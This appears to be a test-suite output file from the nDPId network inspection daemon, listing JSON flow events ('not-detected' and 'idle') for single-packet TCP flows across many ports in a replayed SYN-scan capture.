+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 